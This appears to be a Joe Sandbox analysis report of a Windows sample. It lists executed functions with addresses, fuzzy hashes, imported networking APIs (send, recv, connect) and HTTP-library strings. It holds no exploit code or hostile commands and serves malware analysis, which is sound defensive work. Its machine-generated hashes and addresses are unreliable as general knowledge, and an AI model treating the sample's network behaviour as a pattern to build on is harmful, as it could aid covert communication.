Start time:	05:28:57
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.7%
Total number of Nodes:	659
Total number of Limit Nodes:	13

Executed Functions

Function 00007FF729FA5450 Relevance: 21.0, Strings: 16, Instructions: 950
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

close, xrefs: 00007FF729FA5506
User-Agent, xrefs: 00007FF729FA5967, 00007FF729FA5A43
PUT, xrefs: 00007FF729FA5C16
Host, xrefs: 00007FF729FA55A9, 00007FF729FA565D, 00007FF729FA56D4, 00007FF729FA575A, 00007FF729FA57CE
Proxy-Authorization, xrefs: 00007FF729FA60DF, 00007FF729FA62AC
text/plain, xrefs: 00007FF729FA5DAD
Connection, xrefs: 00007FF729FA54A5, 00007FF729FA552D
POST, xrefs: 00007FF729FA5BFC
cpp-httplib/, xrefs: 00007FF729FA59DA
Accept, xrefs: 00007FF729FA5836, 00007FF729FA58D9
0.18.0, xrefs: 00007FF729FA59F4
Content-Type, xrefs: 00007FF729FA5D3A, 00007FF729FA5DDD
PATCH, xrefs: 00007FF729FA5C30
Content-Length, xrefs: 00007FF729FA5B0C, 00007FF729FA5B99, 00007FF729FA5CA8, 00007FF729FA5E6B, 00007FF729FA5F00
*/*, xrefs: 00007FF729FA58A9
Authorization, xrefs: 00007FF729FA5FC4, 00007FF729FA61CE

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID: */*$0.18.0$Accept$Authorization$Connection$Content-Length$Content-Type$Host$PATCH$POST$PUT$Proxy-Authorization$User-Agent$close$cpp-httplib/$text/plain
API String ID: 0-555702506
Opcode ID: 2ccb0e9a7a1e52feb954c710209bb902442257956837dfcd895d007dbcf47800
Instruction ID: 75b1cbad51e832fa911bd72e82684c1d008ac6c6dcf8f49e68b5d77ec6eab855
Opcode Fuzzy Hash: 2ccb0e9a7a1e52feb954c710209bb902442257956837dfcd895d007dbcf47800
Instruction Fuzzy Hash: B0921F66A05BC798EF74EF65DC902E86364FB46788FC01436DA0D0B75AEE28E305D760

Function 00007FF729F81154 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F8122B
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F8125E
_set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F812EB
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F81358
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF729F81367

Strings

0, xrefs: 00007FF729F81164

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: _initterm$_cexit_set_invalid_parameter_handlerexit
String ID: 0
API String ID: 1032935107-4108050209
Opcode ID: 5b497c8b5191347dcaea54199b7bf7d9ad1edc56956fa3285ea8da4980104bc2
Instruction ID: 6cb3e3aa57cd8b66b358b137c27e7fe5d162af711816137929240bb7a8e358e3
Opcode Fuzzy Hash: 5b497c8b5191347dcaea54199b7bf7d9ad1edc56956fa3285ea8da4980104bc2
Instruction Fuzzy Hash: 0161C226B08B16C9FB90AF95EC803ACA3B0FB48B98F944575DE0C57364DE3CE5409B20

Function 00007FF72A0BFA30 Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,00007FF729FAF12E,?,?,?,?,?,?,?,?,00007FF729FAE984), ref: 00007FF72A0BFA76

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 566b1eb5181a01c38931ee3c24b1c83912687848205ead203a7b4ea62e041f37
Instruction ID: a16a59e15c81a5e3fcccc20934335b4eca6a1823a4375faef2642b6460a35616
Opcode Fuzzy Hash: 566b1eb5181a01c38931ee3c24b1c83912687848205ead203a7b4ea62e041f37
Instruction Fuzzy Hash: 67F0067A740F488A9B149F6AE8804583764F388FD47849826EE2D47734CE38D4A1D760

Function 00007FF72A0C4510 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF72A024BC1,?,?,00000000,00007FF72A024728), ref: 00007FF72A0C4527

Strings

what(): , xrefs: 00007FF72A0C51F3

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: malloc
String ID: what():
API String ID: 2803490479-593870882
Opcode ID: bf209a0b6bec8be7acf69b0bc3a7fe5a554af5f9c54148f7af279e5be374a8cd
Instruction ID: cd97181a3b7c1c8ac7c4d0db5096185188c546144caac15ee8e375051df01462
Opcode Fuzzy Hash: bf209a0b6bec8be7acf69b0bc3a7fe5a554af5f9c54148f7af279e5be374a8cd
Instruction Fuzzy Hash: 60111750F0A60741FF687BA5AC2A3BC9162EF46B80FC40475D90E473C3FD2EA6004A31

Function 00007FF729FAECD0 Relevance: 5.1, APIs: 4, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FAED6C
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FF729FAEDBA

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 79c552450da26a4f5c8212036c143ea646da4273d0e3a3f6bf049597b1d94f67
Instruction ID: 30f67fe3b53aa564aca2f644e566822bba09face95ca3b62b9962f698f146a17
Opcode Fuzzy Hash: 79c552450da26a4f5c8212036c143ea646da4273d0e3a3f6bf049597b1d94f67
Instruction Fuzzy Hash: FA610B66B05B4989EF60EF6AD8842AC67B0FB08FDCF455126EE8D07B59EF38C1408750

Function 00007FF729FB0D10 Relevance: 4.7, APIs: 3, Instructions: 195
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF729FB0D6C
getaddrinfo.WS2_32 ref: 00007FF729FB0E37
WSASocketW.WS2_32 ref: 00007FF729FB0ED8

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: Socketgetaddrinfomemset
String ID:
API String ID: 628396026-0
Opcode ID: 1f5dce6076c97bddc3316f752e8563e6f6563ae3bb5b59bb34551bd5fa5c2a49
Instruction ID: baf62b5875ca4cd4145198ce30be0b8386a79be311aaf6d38d0989e6c7751898
Opcode Fuzzy Hash: 1f5dce6076c97bddc3316f752e8563e6f6563ae3bb5b59bb34551bd5fa5c2a49
Instruction Fuzzy Hash: 0D916A22A057858DEBB0DF25DC503E867A0FB487A8F848235DE5D4BB99DE38D644DB10

Function 00007FF72A0C0A10 Relevance: 4.6, APIs: 3, Instructions: 128
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF729FB2250: ioctlsocket.WS2_32 ref: 00007FF729FB2290

connect.WS2_32 ref: 00007FF72A0C0A6E
setsockopt.WS2_32(?,?,?,?,?,?,?,00007FF729FB100B), ref: 00007FF72A0C0B73
setsockopt.WS2_32(?,?,?,?,?,?,?,00007FF729FB100B), ref: 00007FF72A0C0BE0

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: setsockopt$connectioctlsocket
String ID:
API String ID: 712462417-0
Opcode ID: 205bcde8a042985901f7637f27ab5c0acea52f29cbcd6756816e39d3e5cb1d4b
Instruction ID: 9cf31de8bfd99e4bd493212bf34f20c9158396b7fca281c7e78b5cd7f443c044
Opcode Fuzzy Hash: 205bcde8a042985901f7637f27ab5c0acea52f29cbcd6756816e39d3e5cb1d4b
Instruction Fuzzy Hash: 8C51E67A710B498AEB60DF6AD88029C77A1F78CFD8F459122EE4D47B68DE39D540CB10

Function 00007FF729F9C757 Relevance: 4.6, APIs: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0703273365af9e8dffb52cbd4f9154868d3663246c0baa0c02a2354ded13710c
Instruction ID: 96c177802eadd92605dc0816e2bfd1b3dcdf249e97a407f394f3212def5d9a56
Opcode Fuzzy Hash: 0703273365af9e8dffb52cbd4f9154868d3663246c0baa0c02a2354ded13710c
Instruction Fuzzy Hash: E841EA62B04B1589FB50AF6AEC403AD67B0FB48BA4F440675CE6C577A8DF38D640CB60

Function 00007FF72A074BC0 Relevance: 3.8, APIs: 3, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A072A03,?,00000000,00000000,?,?,00007FF72A07383C), ref: 00007FF72A074C36
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A072A03,?,00000000,00000000,?,?,00007FF72A07383C), ref: 00007FF72A074C59
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?,?,?,?,00007FF72A072A03,?,00000000,00000000,?,?,00007FF72A07383C), ref: 00007FF72A074C7D

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 9c918213fae997c79a4a6200a469a1749a481d91c222e9f36805d53018fad676
Instruction ID: 524a8cbb0b61ab20f89a8412f3e526c8b7f42f3d56d0ac2157cd47d5d098d270
Opcode Fuzzy Hash: 9c918213fae997c79a4a6200a469a1749a481d91c222e9f36805d53018fad676
Instruction Fuzzy Hash: 3321D862F09A9694FB71AF269C00179A754EF05BC8FD84072DE4D07755EE3DD142C721

Function 00007FF729FB6CC0 Relevance: 1.6, APIs: 1, Instructions: 129COMMON

Download Yara Rule

APIs

__WSAFDIsSet.WS2_32 ref: 00007FF729FB6E85

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfad10735707cd8c617cf8e8fad169224bc3c2623d65317f5a9d359f926ec7b7
Instruction ID: bb3bc0e57e682f11e3f4755f15b3f112cc88e9b5143778bcc312b5f5be98afd8
Opcode Fuzzy Hash: cfad10735707cd8c617cf8e8fad169224bc3c2623d65317f5a9d359f926ec7b7
Instruction Fuzzy Hash: AF61F5B2A04BC58DEBB09E25DC503D873A2F74839CF444536DA0C4BB88EF79D6A49B10

Function 00007FF72A0BFAD0 Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,00007FF729FAF22E,?,?,?,?,?,?,?,?,00007FF729FAEAF4), ref: 00007FF72A0BFB16

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 76132b213656df300ebb2809c26ee34a4718ca30a7ec135a8bba010bf16a19a0
Instruction ID: 51414434f04b377f007733004565d9f50924b3e082cccc8f6f8034f7deb0fece
Opcode Fuzzy Hash: 76132b213656df300ebb2809c26ee34a4718ca30a7ec135a8bba010bf16a19a0
Instruction Fuzzy Hash: BCF00C7A740F488A9B149F6AE8804583764F388FD47445816DE2D47734CE38D4619750

Function 00007FF729FB2250 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FF729FB2290

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 13e8bcef4d76c93e56b9beb61fc4d45631ed57af5ac4e3212b3267f6462749e8
Instruction ID: c773eb2a932b208615e13d1f13b1f731c01416a8bfeafd9fdb9c17bd16122766
Opcode Fuzzy Hash: 13e8bcef4d76c93e56b9beb61fc4d45631ed57af5ac4e3212b3267f6462749e8
Instruction Fuzzy Hash: 9FE06D66B08680DAF7019FB99C013EC6BA0D755788F584875EA0C8B778D928DAA29790

Function 00007FF729FB22A0 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,?,?,00007FF729FBFADC,?,?,?,00007FF729FA8309), ref: 00007FF729FB22BF

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: f5df8bcd10026df957f33415990343fdb53ce56afa613633f85972ab2cbc0147
Instruction ID: 0543e7ea79e6517da11899c6ee955439556f40cc449ffee1c0a970c1f4457a45
Opcode Fuzzy Hash: f5df8bcd10026df957f33415990343fdb53ce56afa613633f85972ab2cbc0147
Instruction Fuzzy Hash: 31C01221740744CAE7046BA6FC411642264F788B54F440430D92C0B715CE38D5A34710

Function 00007FF729FAF0E0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

closesocket.WS2_32(?,?,?,00007FF729FA5128,?,?,?,00007FF729FA8323), ref: 00007FF729FAF0FA

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289919804.00007FF72A12A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A12D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289931771.00007FF72A130000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff729f80000_jgbC220X2U.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: c2be8f5812d4fab2217600295b91641614935cd34f4f16db3e57bd7ff934362d
Instruction ID: 0addcb02d525156feb64cd1be07f308d196895e69091fb8ad9a5ca6ede089ec9
Opcode Fuzzy Hash: c2be8f5812d4fab2217600295b91641614935cd34f4f16db3e57bd7ff934362d
Instruction Fuzzy Hash: 50C01221640744C9E7049BA6BC410642264E748B54B440420D92C07314CE24D1A24750

Function 00007FF72A0BB840 Relevance: 1.3, APIs: 1, Instructions: 29stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00007FF729F81E8E), ref: 00007FF72A0BB854

Memory Dump Source

Source File: 00000000.00000002.3289761564.00007FF729F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF729F80000, based on PE: true

Associated: 00000000.00000002.3289748439.00007FF729F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289848384.00007FF72A0C8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289863798.00007FF72A0CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289882535.00007FF72A0EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3289907090.00007FF72A129000.00000004.00000001.01000000.00000003.sdmpDownload File
